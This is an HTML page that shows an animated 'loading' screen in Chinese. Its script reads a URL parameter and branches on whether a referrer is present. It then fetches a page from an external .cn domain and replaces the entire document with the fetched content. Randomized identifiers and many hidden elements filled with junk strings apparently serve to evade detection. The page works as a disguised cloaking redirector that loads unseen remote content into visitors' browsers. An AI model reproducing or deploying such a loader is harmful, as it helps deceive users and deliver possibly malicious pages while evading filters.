<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .a5gutlGeJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .a5gutlGeJ .aH1otscb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .a5gutlGeJ .content {
            line-height: 50px;
            text-align: center
        }

        .a5gutlGeJ .img {
            width: 100%
        }

        .a5gutlGeJ .ONM8hadh {
            text-align: center
        }

        .a5gutlGeJ .ONM8hadh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .a5gutlGeJ .ONM8hadh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .a5gutlGeJ .ONM8hadh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .a5gutlGeJ .ONM8hadh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .a5gutlGeJ .ONM8hadh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .a5gutlGeJ .ONM8hadh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .a5gutlGeJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xg34lJuY5A2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wKWVRO = xg34lJuY5A2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wKWVRO +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wKWVRO +".html?a=share";
		}
		
        EJugcQ0I=url+"#"+new Date().getTime();
        EJugcQ0I && function() {
            $.get(EJugcQ0I, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >SBlTVAzuMHFR1H5OybtZLh</li>
<span style='display:none'>wBFNYg3trtiTSKoqnRmS3XEh5CmhrXRZ1wXKgyKPh7s2i0ww</span>
<ul style='display:none' >cZbn7mzujzIh4qIT1C8j9XgIGtZ8jZ5xfTSbesVkkQ2nCiZ4Jmy</ul>
<img  src='' style='display:none'>
<b style='display:none' >hcTFro3RIYYBz5EZRRCOSmSUqu0XrgGwJ54ttdha79</b>
<b style='display:none' >hcTFro3RIYYBz5EZRRCOSmSUqu0XrgGwJ54ttdha79</b>
<p  style='display:none'>Bmpm92YnyoticICS3kniG2rn8fEERNnp284qkZ10pmss8qjTVY</p>
<ul style='display:none' >cZbn7mzujzIh4qIT1C8j9XgIGtZ8jZ5xfTSbesVkkQ2nCiZ4Jmy</ul><div class="a5gutlGeJ">
    <div class="aH1otscb">
        <div class="ONM8hadh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>UIORR9zBiEtwnT8z2BbQS3dIyUiRYhfsAMorplx5WrrpCGBOwen2CKKjG7fMmMA</a>
<div style='display:none'>QnggklsJbMIrhkJ76l0NnmbLju6sdA9sMR</div>
<h1 style='display:none' >zvWAj2xAUXjhtGvbwAho1qhgCBSY4fEGi0MiSFbqiYX5B3</h1>
<li style='display:none' >eNdV3l7AaNfBS7frrtvYxod7Ygomg85iJms1yXJkA710DiUT7uhxkikpm5OHYfzg</li>
<h1 style='display:none' >zvWAj2xAUXjhtGvbwAho1qhgCBSY4fEGi0MiSFbqiYX5B3</h1>
<p  style='display:none'>bzQ2Vt8IgGOyCsouZKcsZiag</p></body>
</html>